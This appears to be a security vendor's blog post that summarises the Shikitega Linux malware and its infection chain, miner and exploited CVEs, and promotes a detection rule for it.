Shikitega Malware Detection: Executes Multistage Infection Chain, Grants Full Control

New Shikitega Malware

A new stealthy Linux malware named Shikitega is on the prowl for its victims. Its operators set up highly evasive attacks, targeting Linux and IoT devices. The Shikitega malware analysis shows that adversaries have adopted a multi-stage infection chain, aiming to achieve full control of the compromised system, exploit vulnerabilities, establish persistence, and drop additional payloads, including a Monero miner.

This attack mirrors the mounting amount of recent attacks on Linux devices, adding to a rapidly growing list of threats such as Syslogk, XorDdos, and BPFDoor.

Detect Shikitega Malware

To assist security practitioners in spotting possible attacks with new Linux malware, Sittikorn Sangrattanapitak has released a rule that detects the execution of the Shikitega script:

Possible Shikitega Stealthy Malware Targeting Linux System (via process creation)

This detection has translations for the following SIEM, EDR & XDR platforms: Microsoft Sentinel, Elastic Stack, Splunk, Humio, Sumo Logic, ArcSight, QRadar, FireEye, LogPoint, SentinelOne, Graylog, Regex Grep, CrowdStrike, Microsoft PowerShell, RSA NetWitness, Chronicle Security, Microsoft Defender ATP, Snowflake, Securonix, Apache Kafka ksqlDB, Carbon Black, Open Distro, and AWS OpenSearch.

The rule is aligned with MITRE ATT&CK® framework v.10, addressing the Defense Evasion and Execution tactics with Obfuscated Files or Information (T1027) and System Services (T1569) as the primary techniques.

SOC Prime has revolutionized the way that security teams access threat detection content. We harness the power of collaborative cyber defense, working hard towards facilitating a cross-border “Cyber NATO” to effectively withstand emerging threats. Click the Explore Detections button below to instantly reach dedicated detections and dive into relevant cyber threat contexts without registration directly from the Cyber Threats Search Engine.

Explore Detections  

Shikitega Malware Analysis

Security researchers from AT&T Alien Labs documented the new malware strain earlier this September. We still do not know the vector of initial compromise employed by threat actors behind Shikitega malware. Once the threat is in the system, it fetches malicious payloads from a C2 server and runs them in memory. The malware also deploys Metasploit’s ‘Mettle’ meterpreter on the infected system to elevate privileges and execute a wide array of attacks. Shikitega employs a polymorphic encoder to increase its chances of flying under the radar by evading detection by antivirus solutions.

For cryptocurrency mining, the malware Shikitega abuses a legitimate XMRig miner. To deploy it, the malware exploits two highly severe Linux vulnerabilities, CVE-2021-4034 and  CVE-2021-3493.

Join SOC Prime’s Detection as Code platform to unlock access to the world’s largest pool of detection content created by reputable experts in the field. Rest assured that you will not be missing out on any important updates since our SOC experts strive to publish all the latest detections, maintaining a swift response to the latest threats.

Was this article helpful?

Like and share it with your peers.
Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Related Posts